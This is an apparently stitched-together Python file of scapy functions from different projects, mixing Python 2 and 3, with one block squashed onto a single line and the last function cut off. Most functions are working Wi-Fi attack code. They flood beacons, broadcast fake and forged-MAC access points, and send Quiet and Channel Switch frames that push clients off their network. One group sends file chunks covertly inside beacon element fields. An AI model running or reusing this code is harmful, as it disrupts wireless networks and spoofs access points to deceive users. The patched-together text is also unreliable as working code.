def stormWithBeaconFrames():
    """Transmit one hard-coded beacon-style management frame in an endless loop.

    The module-level ``interfaceName`` is only used for the log line; the
    frame itself goes out on the hard-coded ``'wlan0mon'`` interface, so the
    two may disagree. Shows the frame and its hexdump, blocks on
    ``raw_input`` and then calls ``sendp`` with ``loop=1`` (100 ms gap),
    which never returns on its own.
    """
    global interfaceName
    global monitorInterface
    log("Starting with storming on interface [{}]".format(interfaceName))
    network_name = 'testSSID'
    tx_iface = 'wlan0mon'
    # type 0 / subtype 8 management frame, broadcast receiver, random sender/BSSID.
    header = Dot11(type=0, subtype=8,
                   addr1='ff:ff:ff:ff:ff:ff',
                   addr2=str(RandMAC()),
                   addr3=str(RandMAC()))
    capabilities = Dot11Beacon(cap='ESS+privacy')
    ssid_elt = Dot11Elt(ID='SSID', info=network_name, len=len(network_name))
    # RSN IE: version 1, TKIP group cipher, AES+TKIP pairwise, PSK AKM, no capabilities.
    rsn_elt = Dot11Elt(ID='RSNinfo',
                       info='\x01\x00\x00\x0f\xac\x02\x02\x00\x00\x0f\xac\x04'
                            '\x00\x0f\xac\x02\x01\x00\x00\x0f\xac\x02\x00\x00')
    pkt = RadioTap() / header / capabilities / ssid_elt / rsn_elt
    pkt.show()
    print("\nHexdump of frame:")
    hexdump(pkt)
    raw_input("\nPress enter to start\n")
    sendp(pkt, iface=tx_iface, inter=0.100, loop=1)
def createAccessPoint(interface, ssid):
    """Broadcast a beacon frame for *ssid* on *interface* until interrupted.

    Args:
        interface: name of the interface handed to ``sendp``.
        ssid: network name placed in the SSID element (also echoed in logs).

    Uses fixed transmitter/BSSID addresses and an RSN element advertising a
    PSK network. Waits for Enter, then sends with ``loop=1`` every 100 ms;
    the call does not return on its own.
    """
    header = Dot11(type=0, subtype=8,
                   addr1='ff:ff:ff:ff:ff:ff',
                   addr2='22:22:22:22:22:22',
                   addr3='33:33:33:33:33:33')
    capabilities = Dot11Beacon(cap='ESS+privacy')
    ssid_elt = Dot11Elt(ID='SSID', info=ssid, len=len(ssid))
    # RSN IE: version 1, TKIP group cipher, AES+TKIP pairwise, PSK AKM, no capabilities.
    rsn_elt = Dot11Elt(ID='RSNinfo',
                       info='\x01\x00\x00\x0f\xac\x02\x02\x00\x00\x0f\xac\x04'
                            '\x00\x0f\xac\x02\x01\x00\x00\x0f\xac\x02\x00\x00')
    pkt = RadioTap() / header / capabilities / ssid_elt / rsn_elt
    log.info("Beacon Frame created with SSID: '" + ssid + "'")
    log.info("Transmitting Beacon through interface '" + interface + "'")
    raw_input("\nPress Enter to start Access Point '" + ssid + "'\n")
    log.success("Access Point Created!")
    sendp(pkt, iface=interface, inter=0.10, loop=1)
def ssidSpawner(config):
    """Generate random SSIDs forever and transmit a beacon for each.

    Args:
        config: mapping with ``"iface"`` and ``"channel"``; both are handed
            to ``setMonitorMode``/``setChannel`` before anything is sent.

    Every iteration appends a new frame to the accumulated list and calls
    ``sendp`` with ``loop=1``, which itself never returns, so in practice
    only the first iteration's list is ever transmitted. Note that
    ``sendp`` receives the bare name ``iface`` rather than
    ``config["iface"]``; unless a module-level ``iface`` exists this raises
    ``NameError`` — NOTE(review): confirm against the module.
    """
    setMonitorMode(config["iface"])
    setChannel(str(config["iface"]), config["channel"])
    pending = []
    while True:
        name = id_generator()
        print(name)
        header = Dot11(type=0, subtype=8,
                       addr1='ff:ff:ff:ff:ff:ff',
                       addr2=str(RandMAC()),
                       addr3=str(RandMAC()))
        capabilities = Dot11Beacon(cap='ESS+privacy')
        ssid_elt = Dot11Elt(ID='SSID', info=name, len=len(name))
        # RSN IE reproduced as written: a single leading version byte '\x01',
        # then TKIP group cipher, AES+TKIP pairwise, PSK AKM, no capabilities.
        rsn_elt = Dot11Elt(ID='RSNinfo',
                           info='\x01\x00\x0f\xac\x02\x02\x00\x00\x0f\xac\x04'
                                '\x00\x0f\xac\x02\x01\x00\x00\x0f\xac\x02\x00\x00')
        pkt = RadioTap() / header / capabilities / ssid_elt / rsn_elt
        print("SSID=%-20s %r" % (name, pkt))
        pending.append(pkt)
        sendp(pending, iface=iface,
              inter=0.0100 if len(pending) < 10 else 0, loop=1)
def quietAttack(config):
    """Send beacons carrying a Quiet element to config["mac"] for config["time"] seconds.

    Args:
        config: mapping with ``"iface"``, ``"channel"``, ``"time"`` (run
            length in seconds), ``"mac"`` (addr1), ``"bssid"`` (addr2/addr3),
            ``"ssid"`` and ``"interval"`` (sleep between frames, seconds).

    The ``rsn`` element is constructed but is not part of the transmitted
    frame (``frame = RadioTap()/dot11/beacon/essid/quiet``). ``printTime``
    is called once before and once after the send loop.
    """
    #enable monitor mode and set the channel.
    setMonitorMode(config["iface"])
    setChannel(str(config["iface"]), config["channel"])
    timeToRun = (time.time() + config["time"])
    dot11 = Dot11(type=0, subtype=8, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"])
    beacon = Dot11Beacon(cap='ESS+privacy')
    essid = Dot11Elt(ID='SSID',info=config["ssid"], len=len(config["ssid"]))
    rsn = Dot11Elt(ID='RSNinfo', info=(
        '\x01' #RSN Version 1 (single byte as written)
        '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP
        '\x02\x00' #2 Pairwise Cipher Suites (next two lines)
        '\x00\x0f\xac\x04' #AES Cipher
        '\x00\x0f\xac\x02' #TKIP Cipher
        '\x01\x00' #1 Authentication Key Management Suite (line below)
        '\x00\x0f\xac\x02' #Pre-Shared Key
        '\x01\x00')) #RSN Capabilities
    quiet = Dot11Elt(ID='Quiet', info=(
        '\x00' #Quiet count | remaining beacon intervals before quiet interval starts (0 for direct)
        '\x00' #Quiet period | 0 indicates no quiet periods are scheduled; non-zero is the number of beacon intervals between each period.
        '\x00\x10' #Quiet duration | length of quiet period in time units (TU).
        '\x00\x00')) #Quiet offset | optional start time other than right after the beacon, in TU; must be shorter than the beacon interval.
    frame = RadioTap()/dot11/beacon/essid/quiet
    printTime()
    while(time.time() < timeToRun):
        sendp(frame, iface=config["iface"], loop=0, verbose=0)
        time.sleep(config["interval"])
    printTime()
def test():
    """Show one hard-coded beacon frame, then send it in a loop on ``'mon5'``.

    Fixed transmitter/BSSID addresses, ``ESS+privacy`` capabilities and an
    RSN element (version 1, TKIP group, AES+TKIP pairwise, PSK AKM). Blocks
    on ``raw_input`` before ``sendp(loop=1)``, which never returns.
    """
    network_name = 'testSSID'
    tx_iface = 'mon5'
    header = Dot11(type=0, subtype=8,
                   addr1='ff:ff:ff:ff:ff:ff',
                   addr2='22:22:22:22:22:22',
                   addr3='33:33:33:33:33:33')
    capabilities = Dot11Beacon(cap='ESS+privacy')
    ssid_elt = Dot11Elt(ID='SSID', info=network_name, len=len(network_name))
    rsn_elt = Dot11Elt(ID='RSNinfo',
                       info='\x01\x00\x00\x0f\xac\x02\x02\x00\x00\x0f\xac\x04'
                            '\x00\x0f\xac\x02\x01\x00\x00\x0f\xac\x02\x00\x00')
    pkt = RadioTap() / header / capabilities / ssid_elt / rsn_elt
    pkt.show()
    print("\nHexDump of frame:")
    hexdump(pkt)
    raw_input("\nPress enter to start\n")
    sendp(pkt, iface=tx_iface, inter=0.100, loop=1)
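def send_file(filename):
    """Encrypt *filename* chunk by chunk and send every chunk as one frame.

    For each chunk the sequence number (element ID 253) and the encrypted
    chunk (element ID 254) are appended to the module-level ``t_frame`` and
    transmitted on ``if0``. Afterwards throughput is printed and the
    function sniffs on ``opt.iface`` until ``check_missing`` stops it.

    Args:
        filename: path of the file to send; ``stat_file`` supplies the file
            size, chunk count and bytes per chunk.

    Relies on module-level ``box`` (encryptor), ``t_frame``, ``if0``,
    ``opt``, ``stat_file`` and ``check_missing``, none of which are defined
    in this block.
    """
    print("[*] Sending data...")
    file_size, chunks, r_size = stat_file(filename)
    pos = 0
    start = time.time()
    # Context manager so the handle is released even when sendp raises
    # mid-transfer (previously the file was opened and never closed).
    with open(filename, 'rb') as f:
        for seq in range(chunks):
            seq_c = box.encrypt(bytes(str(seq), 'ascii'))
            _seq = Dot11Elt(ID=253, info=seq_c, len=len(seq_c))
            chunk_c = box.encrypt(f.read(r_size))
            _data = Dot11Elt(ID=254, info=chunk_c, len=len(chunk_c))
            _frame = t_frame / _seq / _data
            sendp(_frame, iface=if0, verbose=0, realtime=True)
            tell = f.tell()
            print(f"\t[i] sent frame {seq} of {chunks}, data[{pos}:{tell}], frame size: {len(_frame)}")
            pos = tell
    end = time.time()
    print(f"[*] sent {chunks} in {end - start} seconds")
    # 325 is the per-frame byte figure the author uses for the speed estimate;
    # it is not derived from the actual frame sizes.
    band = (chunks * 325) / (end - start)
    print(f"[*] speed: {(band * 8) / 1000} kbps")
    print("[*] listening for chunk resend")
    sniff(iface=opt.iface, stop_filter=check_missing, monitor=True)
    print("[*] done!")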
def main(): ssids = sys.argv[2:] #Network name here iface = sys.argv[1] #Interface name here frames = [] for netSSID in ssids: print netSSID dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=str(RandMAC()), addr3=str(RandMAC())) beacon = Dot11Beacon(cap='ESS+privacy') essid = Dot11Elt(ID='SSID', info=netSSID, len=len(netSSID)) rsn = Dot11Elt( ID='RSNinfo', info=( '\x01\x00' #RSN Version 1 '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP '\x02\x00' #2 Pairwise Cipher Suites (next two lines) '\x00\x0f\xac\x04' #AES Cipher '\x00\x0f\xac\x02' #TKIP Cipher '\x01\x00' #1 Authentication Key Managment Suite (line below) '\x00\x0f\xac\x02' #Pre-Shared Key '\x00\x00')) #RSN Capabilities (no extra capabilities) frame = RadioTap() / dot11 / beacon / essid / rsn print "SSID=%-20s %r" % (netSSID, frame) frames.append(frame) sendp(frames, iface=iface, inter=0.0100 if len(frames) < 10 else 0, loop=1)
def main():
    """Send beacons named ``"<name> <SUFFIX>"`` for every suffix in the module-level ``ap_slander``.

    Command line is ``<interface> <words of name>``; with fewer than two
    arguments a usage line is printed and the process exits with status 1.
    Each frame gets a random transmitter/BSSID. ``sendp`` loops forever
    (``loop=1``) with a 10 ms gap for fewer than ten frames, 0 otherwise.
    """
    if len(sys.argv) < 3:
        print("usage: %s <interface> <words of name>" % sys.argv[0])
        sys.exit(1)
    tx_iface = sys.argv[1]
    base_name = ' '.join(sys.argv[2:])
    # RSN IE: version 1, TKIP group cipher, AES+TKIP pairwise, PSK AKM, no capabilities.
    rsn_elt = Dot11Elt(ID='RSNinfo',
                       info='\x01\x00\x00\x0f\xac\x02\x02\x00\x00\x0f\xac\x04'
                            '\x00\x0f\xac\x02\x01\x00\x00\x0f\xac\x02\x00\x00')
    pending = []
    for suffix in ap_slander:
        label = base_name + ' ' + suffix.upper()
        print(label)
        header = Dot11(type=0, subtype=8,
                       addr1='ff:ff:ff:ff:ff:ff',
                       addr2=str(RandMAC()),
                       addr3=str(RandMAC()))
        ssid_elt = Dot11Elt(ID='SSID', info=label, len=len(label))
        pending.append(RadioTap() / header / Dot11Beacon(cap='ESS+privacy') / ssid_elt / rsn_elt)
    sendp(pending, iface=tx_iface, inter=0.0100 if len(pending) < 10 else 0, loop=1)
def create_beacon(name, password_protected=False):
    """Return a beacon frame advertising *name*.

    Args:
        name: SSID string.
        password_protected: when true, set the ``privacy`` capability bit and
            append an RSN element (version 1, TKIP group cipher, AES+TKIP
            pairwise, PSK AKM, no capabilities); otherwise plain ``ESS`` and
            no RSN element.

    Returns:
        ``RadioTap / Dot11 / Dot11Beacon / Dot11Elt(SSID)`` optionally
        followed by the RSN element; transmitter and BSSID are random.
    """
    header = Dot11(type=0, subtype=8,
                   addr1='ff:ff:ff:ff:ff:ff',
                   addr2=str(RandMAC()),
                   addr3=str(RandMAC()))
    cap = 'ESS+privacy' if password_protected else 'ESS'
    ssid_elt = Dot11Elt(ID='SSID', info=name, len=len(name))
    stack = RadioTap() / header / Dot11Beacon(cap=cap) / ssid_elt
    if password_protected:
        stack = stack / Dot11Elt(ID='RSNinfo',
                                 info='\x01\x00\x00\x0f\xac\x02\x02\x00\x00\x0f\xac\x04'
                                      '\x00\x0f\xac\x02\x01\x00\x00\x0f\xac\x02\x00\x00')
    return stack
def channelSwitchAttack(config):
    """Repeatedly send a frame carrying a Channel Switch element until config["time"] seconds elapse.

    Args:
        config: mapping with ``"iface"``, ``"channel"``, ``"time"``,
            ``"mac"`` (addr1), ``"bssid"`` (addr2/addr3), ``"ssid"`` and
            ``"interval"`` (sleep between frames, seconds).

    The local constant ``frameType`` selects the frame shape and is
    hard-coded to ``"beacon"``, so the ``action_frame`` branch (two raw
    category bytes plus the element) is unreachable as written. The
    beacon branch builds ``RadioTap/Dot11(subtype 8)/Dot11Beacon/SSID/csa``.
    ``printTime`` is called before and after the send loop.
    """
    frame = ""
    frameType = "beacon" #choose between action_frame or beacon.
    #enable monitor mode and set the channel.
    setMonitorMode(config["iface"])
    setChannel(str(config["iface"]), config["channel"])
    timeToRun = (time.time() + config["time"])
    print("Sending channelSwitchBeacon to " + str(config["mac"]) + " from: " + config["bssid"] + " on channel: " + str(config["channel"]))
    if(frameType == "action_frame"):
        dot11 = Dot11(type=0, subtype=13, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"])
        category = ('\x00' # spectrum management
                    '\x04') #channel switch announcement
        csa = Dot11Elt(ID='Channel Switch', info=(
            '\x00' #Channel switch mode
            '\x04' #new channel
            '\x00')) #channel switch cnt
        frame = RadioTap()/dot11/category/csa
    elif(frameType == "beacon"):
        dot11 = Dot11(type=0, subtype=8, addr1=config["mac"], addr2=config["bssid"], addr3=config["bssid"])
        beacon = Dot11Beacon(cap='ESS+privacy')
        essid = Dot11Elt(ID='SSID',info=config["ssid"], len=len(config["ssid"]))
        csa = Dot11Elt(ID='Channel Switch', info=(
            '\x00' #Channel switch mode
            '\x64' #new channel
            '\x00')) #channel switch cnt
        frame = RadioTap()/dot11/beacon/essid/csa
    printTime()
    while(time.time() < timeToRun):
        #frame.show()
        sendp(frame, iface=config["iface"], loop=0, verbose=0)
        time.sleep(config["interval"])
    printTime()
def recv_missing(tally):
    """Report the chunk numbers in *tally* back to the sender.

    Encrypts the colon-joined list (element ID 224) and the module-level
    file name ``t_file`` (element ID 225) with ``box`` and transmits both
    behind ``t_frame`` on ``opt.iface``.
    """
    tally_c = box.encrypt(":".join(str(x) for x in tally).encode('utf-8'))
    fname_c = box.encrypt(t_file.encode('utf-8'))
    tally_elt = Dot11Elt(ID=224, info=tally_c, len=len(tally_c))
    fname_elt = Dot11Elt(ID=225, info=fname_c, len=len(fname_c))
    sendp(t_frame / tally_elt / fname_elt, iface=opt.iface)
def probe_resp(self, message):
    """Send one probe-response-shaped frame (subtype 5) carrying *message*.

    The base frame comes from ``self.base_frame``; Rates and DSset elements
    are appended from ``self.rates``/``self.dsset``. Sent once (``loop=0``)
    on ``self.interface`` with a 100 ms ``inter``.
    """
    pkt = self.base_frame(5, message=message)
    pkt = pkt / Dot11Elt(ID='Rates', info=self.rates) / Dot11Elt(ID='DSset', info=self.dsset)
    print("[*] 802.11 Probe Response: SSID = %s" % self.net_ssid)
    sendp(pkt, iface=self.interface, inter=0.100, loop=0, verbose=False)
def probe_req(self, message=''):
    """Send one probe-request-shaped frame (subtype 4) via ``srp`` and wait for replies.

    The base frame comes from ``self.base_frame``; Rates and DSset elements
    are appended from ``self.rates``/``self.dsset``. ``srp`` is called with
    its defaults, so no interface is chosen explicitly here.
    """
    pkt = self.base_frame(4, message=message)
    pkt = pkt / Dot11Elt(ID='Rates', info=self.rates) / Dot11Elt(ID='DSset', info=self.dsset)
    print("[*] 802.11 Probe Request: SSID = %s" % self.net_ssid)
    srp(pkt)
def build(name):
    """Return a beacon frame for *name* using the module-level ``dest``/``source`` addresses.

    ``ssid(name)`` (defined elsewhere) produces the SSID element payload; an
    eight-byte Rates element follows. The capability field is the raw value
    ``0x1111``.
    """
    header = Dot11(type=0, subtype=8, addr1=dest, addr2=source, addr3=source)
    rates = bytes([140, 18, 152, 36, 176, 72, 96, 108])
    body = (Dot11Beacon(cap=0x1111)
            / Dot11Elt(ID="SSID", info=ssid(name))
            / Dot11Elt(ID="Rates", info=rates))
    return RadioTap() / header / body
def geracao_pacotes(self):
    """Build one beacon frame and send it a user-chosen number of times.

    Packet count and send interval are read via ``.get()`` from
    ``self.numero_pacotes`` and ``self.intervalo`` (presumably UI entry
    widgets — confirm). The transmitter address is forged by
    ``self.criacao_mac_ponto_referencia()``; interface and SSID are
    hard-coded. ``sendp``'s return value is printed and the screen is
    refreshed with ``self.atualizar_tela()`` afterwards.
    """
    network_name = 'testSSID'
    tx_iface = 'wlp3s0mon'  # wireless interface name
    forged_mac = self.criacao_mac_ponto_referencia()
    count = int(self.numero_pacotes.get())
    gap = float(self.intervalo.get())
    # addr1 = destination MAC (the wireless card), addr2 = forged sender MAC,
    # addr3 = access point MAC.
    header = Dot11(type=0, subtype=8,
                   addr1='E4:18:6B:4B:94:00',
                   addr2=forged_mac,
                   addr3='33:33:33:33:33:33')
    capabilities = Dot11Beacon(cap='ESS+privacy')  # advertised AP capabilities
    ssid_elt = Dot11Elt(ID='SSID', info=network_name, len=len(network_name))
    rsn_elt = Dot11Elt(ID='RSNinfo',
                       info='\x01\x00\x00\x0f\xac\x02\x02\x00\x00\x0f\xac\x04'
                            '\x00\x0f\xac\x02\x01\x00\x00\x0f\xac\x02\x00\x00')
    pkt = RadioTap() / header / capabilities / ssid_elt / rsn_elt
    pkt.show()
    print("HexDump of frame")
    hexdump(pkt)
    # inter = gap between packets, count = number of packets to send.
    result = sendp(pkt / "RURALRURALRURAL", iface=tx_iface, inter=gap, loop=0, count=count)
    print(result)
    self.atualizar_tela()
def encapsulate(payload, addr_from, addr_to=BroadcastAddress):
    """Wrap *payload* into a beacon-shaped frame as a chain of 255-byte elements.

    Args:
        payload: sequence to carry; split into slices of at most 255 bytes,
            each placed in a ``Dot11Elt`` with ID ``Dot11ElemID_Identity``.
        addr_from: value for addr3; addr2 is the module-level ``SignatureAddress``.
        addr_to: receiver address, defaulting to ``BroadcastAddress``.

    Returns:
        ``RadioTap / Dot11 / Dot11Beacon(ESS)`` followed by the elements in
        payload order. An empty payload yields just the header stack.
    """
    from scapy.all import Dot11, Dot11Beacon, Dot11Elt, RadioTap
    header = Dot11(type=0, subtype=8, addr1=addr_to, addr2=SignatureAddress, addr3=addr_from)
    frame = RadioTap() / header / Dot11Beacon(cap='ESS')
    chunk_size = 255
    total = len(payload)
    for offset in range(0, total, chunk_size):
        sz = min(chunk_size, total - offset)
        frame /= Dot11Elt(ID=Dot11ElemID_Identity, info=payload[offset:offset + sz], len=sz)
    return frame
def create_packet(packet):
    """Re-send a captured beacon with its DSset (channel) element rewritten.

    Only packets containing ``Dot11Beacon`` are handled; anything else falls
    through and nothing is sent. The new channel is ``(channel + 6) % 11``,
    so channel 5 maps to 0; ``channel`` is ``None`` when ``network_stats``
    has no entry — NOTE(review): confirm both cases are intended.
    ``newPacket`` aliases ``packet`` (no copy), so the input is modified in
    place. ``bssid`` and ``ssid`` are extracted but unused. ``sendp`` runs
    with ``loop=1`` on ``args.Interface`` and does not return on its own.
    """
    #hexdump(packet)
    if packet.haslayer(Dot11Beacon):
        # extract the MAC address of the network
        bssid = packet[Dot11].addr2
        # get the name of it
        ssid = packet[Dot11Elt].info.decode()
        # extract network stats
        stats = packet[Dot11Beacon].network_stats()
        # get the channel of the AP
        channel = stats.get("channel")
        # calculate the new channel
        newChannel = (channel + 6) % 11
        # get the end of the original packet (presumably the 4th Dot11Elt occurrence onward — confirm)
        oldEltend = packet[Dot11Elt][3]
        # get the content of original packet (same object, not a copy)
        newPacket = packet
        # change the DSset to the new calculated value. This will clear everything that follows
        newPacket[Dot11Elt][2] = Dot11Elt(ID='DSset', info=chr(newChannel), len=1)
        # concatenate the end of the packet with what we created before
        finalPacket = newPacket / oldEltend
        # send the packet until the user stops it
        sendp(finalPacket, iface=args.Interface, inter=0.10, loop=1)
def send_stat(filename):
    """Announce *filename*'s size and chunk count in one encrypted element (ID 222).

    ``stat_file`` supplies (size, chunks, bytes per chunk); the ASCII text
    ``"<size>:<chunks>"`` is encrypted with the module-level ``box`` and
    sent behind ``t_frame`` on ``if0``.
    """
    file_size, chunks, r_size = stat_file(filename)
    print("[*] Sending file stat frame...")
    stat_c = box.encrypt(f"{file_size}:{chunks}".encode('ascii'))
    stat_elt = Dot11Elt(ID=222, info=stat_c, len=len(stat_c))
    sendp(t_frame / stat_elt, iface=if0, verbose=0, realtime=True)
def sendAssocReq():
    """Send one association-request-shaped management frame (type 0, subtype 0).

    Addresses come from the module-level ``config``: addr1 = ``config["bssid"]``,
    addr2/addr3 = ``config["mac"]``; the frame is shown and then sent once
    on ``config["iface"]``. ``Dot11AssoReq`` is given ``ID=ESS`` — ``ESS``
    is not defined in this block (presumably module-level; confirm). The
    ``rsn`` element is built but excluded from the frame (``#/rsn``).
    """
    #packet to client
    dot11 = Dot11(type=0, subtype=0, addr1=config["bssid"], addr2=config["mac"], addr3=config["mac"])
    auth = Dot11AssoReq(ID=ESS, info='\x01')#ESS=0x0, privacy=0x1)
    essid = Dot11Elt(ID='SSID',info="wips-test-psk", len=len("wips-test-psk"))
    # TODO: convert rsn to Dot11EltRSN
    rsn = Dot11Elt(ID='RSNinfo', info=(
        '\x01' #RSN Version 1 (single byte as written)
        '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP
        '\x02\x00' #2 Pairwise Cipher Suites (next two lines)
        '\x00\x0f\xac\x04' #AES Cipher
        '\x00\x0f\xac\x02' #TKIP Cipher
        '\x01\x00' #1 Authentication Key Management Suite (line below)
        '\x00\x0f\xac\x02' #Pre-Shared Key
        '\x00\x00')) #RSN Capabilities (no extra capabilities)
    frame = RadioTap()/dot11/auth/essid#/rsn
    frame.show()
    sendp(frame, iface=config["iface"], inter=0.100, loop=0)
def send_chunks(filename, chunk_list):
    """Re-send the chunks of *filename* whose sequence numbers are in *chunk_list*.

    Each requested chunk is read from offset ``r_size * seq`` (``r_size``
    from ``stat_file``), encrypted with the module-level ``box`` and sent as
    elements 253 (sequence) and 254 (data) behind ``t_frame`` on ``if0``.
    """
    file_size, chunks, r_size = stat_file(filename)
    with open(filename, 'rb') as src:
        for seq in chunk_list:
            seq_c = box.encrypt(bytes(str(seq), 'ascii'))
            seq_elt = Dot11Elt(ID=253, info=seq_c, len=len(seq_c))
            offset = r_size * seq
            src.seek(offset)
            chunk_c = box.encrypt(src.read(r_size))
            data_elt = Dot11Elt(ID=254, info=chunk_c, len=len(chunk_c))
            pkt = t_frame / seq_elt / data_elt
            sendp(pkt, iface=if0, verbose=0, realtime=True)
            tell = src.tell()
            print(f"\t[i] resent frame {seq} of {chunks}, data[{offset}:{tell}], frame size: {len(pkt)}")
def gen_packet(ssid, source_mac):
    """Return a beacon frame for *ssid* with *source_mac* as transmitter and BSSID.

    Capabilities are ``ESS+privacy``; an RSN element (version 1, TKIP group
    cipher, AES+TKIP pairwise, PSK AKM, no capabilities) is appended.
    """
    header = Dot11(type=0, subtype=8,
                   addr1="ff:ff:ff:ff:ff:ff",
                   addr2=source_mac,
                   addr3=source_mac)
    ssid_elt = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
    rsn_elt = Dot11Elt(ID="RSNinfo",
                       info='\x01\x00\x00\x0f\xac\x02\x02\x00\x00\x0f\xac\x04'
                            '\x00\x0f\xac\x02\x01\x00\x00\x0f\xac\x02\x00\x00')
    return RadioTap() / header / Dot11Beacon(cap="ESS+privacy") / ssid_elt / rsn_elt
def send_beacon(mac, ssid, verbose=False):
    """Loop-send a beacon for *ssid* from *mac* on the module-level ``interface``.

    No RSN element is attached even though the ``privacy`` bit is set.
    ``sendp`` runs with ``loop=1`` and a 100 ms gap, so this never returns.
    """
    header = Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=mac, addr3=mac, type=0, subtype=8)
    ssid_elt = Dot11Elt(ID="SSID", info=ssid, len=len(ssid))
    pkt = RadioTap() / header / Dot11Beacon(cap="ESS+privacy") / ssid_elt
    if verbose:
        print(f"Sending beacon: {ssid}")
    sendp(pkt, inter=0.1, loop=1, iface=interface, verbose=0)
def _send_802_11_frame(self, ssid):
    """Send one beacon for *ssid* on ``self.ap.iface`` with a hand-built RadioTap header.

    addr2/addr3 are ``self.ap.ip`` (the attribute is called ``ip`` but is
    used in MAC address fields — presumably a MAC string; confirm). The
    RadioTap ``notdecoded`` bytes embed ``get_frequency(self.ap.ch)``
    (defined elsewhere) between fixed flag/rate and signal/antenna bytes.
    """
    header = Dot11(type=0, subtype=8,
                   addr1="ff:ff:ff:ff:ff:ff",
                   addr2=self.ap.ip,
                   addr3=self.ap.ip)
    ssid_elt = Dot11Elt(ID='SSID', info=ssid, len=len(ssid))
    rt = RadioTap(len=18,
                  present='Flags+Rate+Channel+dBm_AntSignal+Antenna',
                  notdecoded='\x00\x6c' + get_frequency(self.ap.ch) + '\xc0\x00\xc0\x01\x00\x00')
    sendp(rt / header / Dot11Beacon() / ssid_elt, iface=self.ap.iface, verbose=False)
def __beacon_send(self, ssid, inter, enc):
    """Loop-send a beacon for *ssid* on ``self.iface`` every *inter* seconds.

    Args:
        ssid: network name for the SSID element.
        inter: gap between frames passed to ``sendp``.
        enc: when truthy, advertise ``ESS+privacy`` and append the RSN
            element; otherwise plain ``ESS`` without it.

    Transmitter and BSSID both come from ``gu.rand_mac()``. ``loop=1`` means
    the call does not return on its own.
    """
    tx_addr = gu.rand_mac()
    bss_addr = gu.rand_mac()
    header = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=tx_addr, addr3=bss_addr)
    ssid_elt = Dot11Elt(ID='SSID', info=ssid, len=len(ssid))
    if enc:
        rsn_elt = Dot11Elt(ID='RSNinfo',
                           info='\x01\x00\x00\x0f\xac\x02\x02\x00\x00\x0f\xac\x04\x00\x0f\xac\x02\x01\x00\x00\x0f\xac\x02\x00\x00')
        pkt = RadioTap() / header / Dot11Beacon(cap='ESS+privacy') / ssid_elt / rsn_elt
    else:
        pkt = RadioTap() / header / Dot11Beacon(cap='ESS') / ssid_elt
    sendp(pkt, iface=self.iface, inter=inter, loop=1)
def size_test_breadth():
    """Probe how large an element payload can be sent before scapy or the driver fails.

    For ``i`` in 0..65534, encrypts ``'A' * i`` with the module-level
    ``box``, places it in two elements (IDs 253 and 254) behind ``t_frame``
    and sends once on ``if0``. Returns ``False`` after printing the failing
    size on the first exception, ``True`` if every size went through.
    """
    global box, t_frame, if0
    for size in range(65535):
        try:
            blob = box.encrypt(('A' * size).encode('ascii'))
            first = Dot11Elt(ID=253, info=blob, len=len(blob))
            second = Dot11Elt(ID=254, info=blob, len=len(blob))
            sendp(t_frame / first / second, iface=if0, loop=0, inter=0.100, count=1, verbose=0)
        except Exception as exc:
            # size * 4 is the author's reported figure; it is not the frame length.
            print("[t] Fail at frame: {}, size: {}\n[e] {}".format(size, size * 4, str(exc)))
            return False
    print("[t] absolute unit!")
    return True
def send(self, ssid='Input your SSID'):
    """Loop-send a beacon for *ssid* on ``self.interface`` (100 ms gap; never returns).

    Transmitter and BSSID share one random MAC from ``utils.rand_mac()``.
    The capability field is left at ``Dot11Beacon``'s default while an RSN
    element (version 1, TKIP group, AES+TKIP pairwise, PSK AKM) is appended.
    """
    mac = utils.rand_mac()
    # type 0 / subtype 8: management frame, beacon
    header = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=mac, addr3=mac)
    ssid_elt = Dot11Elt(ID='SSID', info=ssid, len=len(ssid))
    rsn_elt = Dot11Elt(ID='RSNinfo',
                       info='\x01\x00\x00\x0f\xac\x02\x02\x00\x00\x0f\xac\x04'
                            '\x00\x0f\xac\x02\x01\x00\x00\x0f\xac\x02\x00\x00')
    pkt = RadioTap() / header / Dot11Beacon() / ssid_elt / rsn_elt
    sendp(pkt, iface=self.interface, inter=0.100, loop=1)
def base_frame(self, subtype, message=''):
    """Assemble ``RadioTap / Dot11 / <subtype layer> / SSID [/ vendor payload]``.

    Args:
        subtype: 4 → ``Dot11ProbeReq``, 5 → ``Dot11ProbeResp``,
            8 → ``Dot11Beacon(cap='ESS')``; any other value inserts an empty
            string in place of the subtype layer.
        message: text encoded (UTF-8, via ``str.encode``) into a ``vendor``
            element appended last.

    Returns:
        The frame, or the empty list ``[]`` when *message* is empty — the
        header stack is still built in that case but discarded.

    Uses ``self.dst``, ``self.source``, ``self.bssid`` and ``self.net_ssid``.
    """
    if subtype == 4:
        body = Dot11ProbeReq()
    elif subtype == 5:
        body = Dot11ProbeResp()
    elif subtype == 8:
        body = Dot11Beacon(cap='ESS')
    else:
        body = ''
    header = Dot11(type='Management', subtype=subtype, FCfield=0,
                   addr1=self.dst,      # receiver
                   addr2=self.source,   # transmitter
                   addr3=self.bssid)    # BSSID
    ssid_elt = Dot11Elt(ID='SSID', info=self.net_ssid, len=len(self.net_ssid))
    stack = RadioTap() / header / body / ssid_elt
    if not message:
        return []
    data = str.encode(message)
    return stack / Dot11Elt(ID='vendor', info=data, len=len(data))
def quietActionAttack(config):
    """Send action frames (type 0, subtype 13) carrying an Extended Channel Switch Announcement element.

    Args:
        config: mapping with ``"iface"``, ``"channel"``, ``"time"`` (seconds
            to run), ``"mac"`` (addr1), ``"bssid"`` (addr2/addr3) and
            ``"interval"`` (sleep between frames, seconds).

    The frame body is two raw category bytes followed by the ``csa``
    element. Despite the function name, the ``quiet`` element is
    constructed but not included in the transmitted frame
    (``frame = RadioTap()/dot11/category/csa``). ``printTime`` is called
    before and after the send loop.
    """
    #enable monitor mode and set the channel.
    setMonitorMode(config["iface"])
    setChannel(str(config["iface"]), config["channel"])
    timeToRun = (time.time() + config["time"])
